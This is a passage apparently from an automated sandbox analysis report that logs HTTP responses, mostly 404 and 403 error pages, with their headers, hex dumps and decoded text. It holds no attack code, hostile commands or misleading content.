ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:01:30 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:20 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:01:30 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 14:33:36 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66f0ea70-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:33:42 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:33:45 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:33:48 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:33:50 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 34 77 63 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /4wc1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:34:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:34:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:34:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:34:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 12 Nov 2024 14:35:04 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 12 Nov 2024 14:35:07 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 